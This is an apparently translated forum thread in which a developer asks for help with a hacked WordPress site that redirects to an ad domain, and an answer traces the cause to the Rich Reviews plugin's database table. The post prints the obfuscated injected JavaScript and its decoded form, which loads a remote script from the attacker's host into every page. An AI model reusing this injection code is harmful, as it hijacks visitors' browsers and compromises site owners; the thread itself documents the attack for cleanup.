因此,基本上我客户的网站被黑了,每次我打开时,它都会重定向到另一个网站(多数是广告)。
它的行为,每次我运行网站时,它都会自动更改主URL和站点URL。
我尝试过,我在cpanel中更改了主页URL和站点URL,但再次运行了它重定向的站点。然后它也会自动更改为cpanel中的该地址。
在cpanel中更改url之后,直到运行前端,我都可以访问后端。我使用Sucuri插件进行了扫描,以下显示了错误消息,
11: 1569826918_2:"Error: admin, 122.160.112.18; General settings changed: (multiple entries): siteurl: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/t3.js?',home: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/a3.js?'"
站点地址出于隐私原因而更改。重定向网址在那里。
我检查了所有可能的文件,但是找不到任何可疑的代码。谁能帮我。
编辑:
经过几个小时的研究,我发现这是从下面的加密代码注入的,
eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,9,101,108,101,109,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,32,10,32,32,32,32,101,108,101,109,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,98,101,115,46,98,101,108,97,116,101,114,98,101,119,97,115,116,104,101,114,101,46,99,111,109,47,99,111,114,110,47,102,108,101,120,46,106,115,63,116,112,61,55,57,57,39,59,10,32,32,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,32,32,125,41,40,41,59));
当我从此站点https://malwaredecoder.com/
解密此代码时,我得到了,
eval( (function() {
var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.src = 'https://bes.belaterbewasthere.com/corn/flex.js?tp=799';
document.getElementsByTagName("head")[0].appendChild(elem);
})(););
是!即重定向了网址https://bes.belaterbewasthere.com
并引发广告。
答案 0 :(得分:1)
两天前,我遇到了同样的问题,并且当代码还不存在时,我用两个星期大的数据库覆盖了整个数据库,从而解决了我的问题。 该代码位于Rich Reviews使用的表中,并在其中插入。该插件因此问题而闻名,因此已从Wordpress中删除。 在也删除了插件之后,我与Google adwords取得了联系,他们检查了现在一切是否正常,并且一切正常,然后重新启动了adwords广告系列。
如果没有备份,则可以尝试删除与代码所在的表相关联的插件(也许也是Rich Reviews)来解决问题。我遇到此问题的表是rr_options。